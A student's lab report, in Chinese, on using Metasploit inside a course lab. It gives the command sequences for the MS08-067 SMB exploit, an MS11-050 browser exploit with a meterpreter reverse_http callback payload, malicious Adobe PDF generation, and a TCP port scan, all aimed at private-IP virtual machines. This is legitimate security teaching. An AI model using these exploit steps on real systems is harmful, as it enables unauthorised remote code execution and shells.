20155317 王新玮《网络对抗技术》实验5 MSF基础应用 20155317 王新玮《网络对抗技术》实验5 MSF基础应用 实验总结

1. MS08_067安全漏洞

  • 原理:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行。

实验步骤

首先进入msf控制台,对漏洞MS08_067进行信息搜索。目的是为了获取模块名,以便之后的设置需要。所以,在本次的实验中,我们首先需要对这个攻击模块进行查询,搜索,了解之后再进行相关的配置。

search ms08_067

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

查询完成之后,我们选择相应的路径进行使用,use + 路径

 之后,我们使用show payloads 来查看有哪些相关载体

show payloads

  

 20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

如图所示,我们选中相应载体,进行使用

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结 

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

完成后,我们设置相关的参数

 set LHOST 192.168.130.130 //本机IP

 set LPORT 5317 //设置连接端口

 set RHOST 192.168.130.133 //想攻击的主机的IP

 set target 0 //自动寻找目标 AUTO

 exploit //攻击

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

在设置好相关参数之后,攻击成功。

还有一点:在第一遍尝试的时候,我并没有成功的直接获取到shell,后来发现是windows没有关闭防火墙,后来关闭防火墙之后,便顺利成功了

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

2.浏览器渗透攻击——MS11-050

在完成这个实验之前,我下载并使用了狄老师提供的XP虚拟机。在开始使用时,我发现了。。。。

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

我以为这是狄老师留给我们的闯关秘籍,说不定看看就能懂得所有套路,完成所有实验。我打开后。。

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

虚拟机已崩塌。。。。。连任务管理器都关不了。。。。

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

重启重启。。。

okok,重启之后,实验开始。。

根据上个实验的基本操作步骤,首先进行

search ms11_050

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

完成后,我们开始设置相关参数

 set payload windows/meterpreter/reverse_http //http反向回连

 set LHOST 192.168.130.130 //攻击机ip

 set LPORT 5303 //攻击端口固定

 set URIPATH 2015dwj //统一资源标识符路径设置

 exploit

 20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

完成之后,我们在xp虚拟机的ie浏览器里输入Local IP

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

这个出现了错误,kali 没有获得相关的shell

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

看了狄老师的博客,发现也没有解决这个问题,我在找为什么失败,如果是IE版本没有问题的话,那可能是在某些浏览器设置上出现了问题,还在解决。。。

3. adobe_pdf_phoneix_exec,PDF阅读器攻击

老步骤,首先我们需要寻找adobe相关的攻击漏洞search 一下

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

我们选取了这个作为攻击手段吧。感觉前面有excellent ,应该攻击挺容易吧

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

用show option 看一下相关的参数。

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

我们发现它一共需要三个,其中两个已经有了通常性设置了,所以只需要设置RHOST即可

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

我们用exploit执行之后,发现提示unreachable,应该是不能ping通

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

后来测试发现是可以ping通的,但不知道为什么不成功,攻击失败。。。。

4.  windows/fileformat/adobe_cooltype_sing

本次我又开始其他的尝试

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

老规矩,复制粘贴,show option ,让我看看你需要啥

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

设置好相关参数,exploit创建pdf

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

这次十分顺利,创建成功,接下来,我们将其导入xp内部

啊!!!经过几次虚拟机的崩塌以及wm的崩塌,pdf终于到了xp上了。。。惊心动魄的时刻终于来了!

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

唉。。。没有成功,可能这个版本不对吧,我再从网上找找其他版本。。哎。。难受,咋就不成功呢。

补:后来经过老师的帮助,我发现,自己产生的这个pdf并不能够产生回连,在运行该程序之后,用netstat命令之后,查不到当时的连接情况

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

为了排除到底是哪里出的问题,我运行了狄老师的pdf,并用netstat命令查看连接,发现狄老师的可以存在连接

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

这就说明,是我的pdf文件生成的有问题,但是如果是我配置出问题的话,也一定会存在连接的情况。所以我利用同学的电脑,做了一下本次的实验,最后也取得了成功。

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

4.1补充实验:(用自己电脑)

 在狄老师给虚拟机中,狄老师已经有了相应的pdf文件,其实也可以不用生成,只把kali的ip改一下,把端口设置成狄老师所设置的端口就可以,从开始抓包的时候我们可以看出,狄老师设置的回连IP为192.168.220.130 端口为5303,所以我们按照这个设置一下:

修改IP:
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

在这边设置好了之后,在xp上我点开了pdf文件,发现并没有出现回连的情况,没有获得windows shell,此时我我用netstat命令进行查看,我发现连接的情况变成了其他样子。

 20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

之前的:

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

情况十分怪异,但是从原理上来讲,这样修改更改IP和配置端口是可以使用狄老师的pdf文件的。

5.0 use auxiliary/scanner/portscan/tcp

20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

 20155317 王新玮《网络对抗技术》实验5 MSF基础应用
20155317 王新玮《网络对抗技术》实验5 MSF基础应用
实验总结

这个模块是查看端口的开放情况,在这里我们只扫描了一个主机,查看了其1-6000端口的开放情况。

实验总结

            通过本次实验,我了解了更多的攻击方法和一些漏洞的使用情况,其实漏洞哪里都有,系统、软件这些都可以存在漏洞,以前我觉得我的本机在更新office的漏洞没啥用,现在看来,还是好好更新吧。在这个实验中也出现了很多问题,出现了这种不能回连的怪异的情况,也学会了很多解决问题和分析问题的方法,在这个实验中,首先排出了xp的问题,后来又排除了kali的问题,虽然最后没有解决,但是也收获多多。